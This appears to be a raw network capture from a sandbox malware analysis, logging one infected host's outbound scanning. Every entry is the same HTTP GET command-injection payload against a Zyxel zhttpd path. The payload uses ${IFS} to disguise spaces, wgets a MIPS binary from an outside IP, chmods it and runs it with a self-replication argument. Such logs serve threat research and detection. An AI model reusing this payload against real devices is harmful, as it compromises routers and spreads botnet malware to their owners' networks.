                                            Jan 14, 2024 15:50:42.463215113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5083192.168.2.2333256184.155.233.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463283062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5084192.168.2.2357982201.7.72.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463321924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5085192.168.2.2348928149.128.4.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463339090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5086192.168.2.2338290207.97.191.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463386059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5087192.168.2.2335302111.174.106.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463411093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5088192.168.2.2353950144.176.42.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463443041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5089192.168.2.2334880160.225.171.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463468075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5090192.168.2.234576485.228.23.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463479996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5091192.168.2.2356946186.32.102.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463506937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5092192.168.2.2346520107.123.231.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463507891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5093192.168.2.236067085.4.78.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463524103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5094192.168.2.234259047.178.98.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463566065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5095192.168.2.2347614205.17.24.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463573933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5096192.168.2.2357528164.131.245.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463593006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5097192.168.2.233609057.2.91.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463614941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5098192.168.2.2335862103.252.101.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463673115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5099192.168.2.2352678156.252.121.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463704109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5100192.168.2.235917439.202.93.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463712931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5101192.168.2.2350068188.249.181.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463738918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5102192.168.2.233459452.17.231.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463812113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5103192.168.2.2339472216.68.56.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463828087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5104192.168.2.2339428216.215.49.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463871956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5105192.168.2.233471281.230.45.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463926077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5106192.168.2.234708224.66.154.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463953018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5107192.168.2.2360082177.8.190.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463973999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5108192.168.2.235849014.80.105.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463998079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5109192.168.2.2346564112.99.224.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464031935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5110192.168.2.2346394171.93.43.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464054108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5111192.168.2.2333044167.125.109.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464068890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5112192.168.2.234574242.110.212.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464076996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5113192.168.2.2343974146.139.73.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464127064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5114192.168.2.233967638.180.190.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464138985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5115192.168.2.2349606204.214.179.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464202881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5116192.168.2.2358570169.125.42.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464214087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5117192.168.2.2350952223.237.109.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464246035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5118192.168.2.2339812144.7.1.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464277983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5119192.168.2.2343980169.103.29.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464304924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5120192.168.2.2360252193.71.156.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464323044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5121192.168.2.2337418178.229.171.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464348078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5122192.168.2.2347696134.19.193.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464389086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5123192.168.2.233419617.130.146.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464422941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5124192.168.2.2356770149.116.113.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464456081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5125192.168.2.2334808184.254.134.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464494944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5126192.168.2.2358450106.165.43.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464519024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5127192.168.2.2355780141.206.104.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464550972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5128192.168.2.2360168211.218.166.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464561939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5129192.168.2.2348818179.199.216.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464587927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5130192.168.2.2332878106.34.107.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464617014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5131192.168.2.2334492118.12.158.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464663029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5132192.168.2.2339076148.47.109.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464684010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5133192.168.2.23403748.35.198.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464689016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5134192.168.2.2344654156.124.11.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464709044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5135192.168.2.2360888208.121.113.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464739084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5136192.168.2.234500868.134.238.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464786053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5137192.168.2.2357140119.67.242.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464804888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5138192.168.2.233350651.4.59.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464832067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5139192.168.2.2358210132.60.104.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464845896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5140192.168.2.2355484195.59.33.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464874029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5141192.168.2.2346388121.157.144.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464905024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5142192.168.2.235188067.103.241.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464942932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5143192.168.2.233660473.188.241.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.464960098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5144192.168.2.234181238.17.234.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465009928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5145192.168.2.2334740186.14.154.144443
                                            TimestampBytes transferredDirectionData
